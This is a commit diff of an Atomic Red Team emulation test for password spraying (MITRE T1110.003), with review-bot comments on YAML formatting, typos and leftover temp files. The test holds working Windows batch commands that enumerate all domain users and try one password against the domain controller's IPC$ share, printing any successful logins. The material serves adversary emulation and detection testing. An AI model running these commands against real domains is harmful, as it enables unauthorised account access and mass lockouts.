some cleanup

clr2of8
2020-06-25 19:27:02 -06:00
parent 86549295ad
commit a084ff4ae6
+18 -6
@@ -1,8 +1,15 @@
attack_technique: T1110.003
display_name: 'Brute Force: Password Spraying'
atomic_tests:
- name: Password Spray all domain users
description: This atomic will create a list of all domain users in the temp directory called users.txt. It will then attempt to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the list. It will print successful authentications to the screen.
- name: Password Spray all Domain Users
description:
CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list.
Any successful authentications will be printed to the screen with a message like "[*] username:password". No output will be received if no successful
authentications occur. Use the input arguments to specify your own password to use for the password spray.
Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
supported_platforms:
- windows
input_arguments:
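Review bot: The new `description:` value is written as a plain multi-line scalar starting on the line after the key, so YAML folds the "CAUTION!" lockout warning and everything after it into one run-on paragraph. Use a block scalar (`description: |`), as the dependency description later in this file does, so the warning stays on its own line. The text also still names Spring2020 directly although the password is an input argument; pointing at the `password` argument's default would keep the two from drifting apart.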
@@ -10,14 +17,19 @@ atomic_tests:
description: The password to try for each user in users.txt
type: string
default: Spring2020
executor:
command: |-
dependencies:
- description: |
List of domain users to password spray must exits at %tempe%\users.txt
prereq_command: |
if not exist %temp%\users.txt (exit /b 1)
get_prereq_command: |
rem Create the users.txt by parsing the "net users /domain" output
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Execute the password spray, trying the password set above for every user in the domain
executor:
command: |-
@FOR /F %n in (%temp%\users.txt) do @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
name: powershell
name: command_prompt
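Review bot: The dependency description reads "must exits at %tempe%\users.txt"; it should say "must exist at %temp%\users.txt" so it matches the path that `prereq_command` actually checks. The `rem Execute the password spray, ...` line ends up as the last line of `get_prereq_command`, where no spraying happens; move it into the executor `command` or drop it. `get_prereq_command` also leaves %temp%\1.txt, %temp%\2.txt and %temp%\3.txt behind once users.txt is built; delete them at the end of that script, since they hold the parsed domain user list.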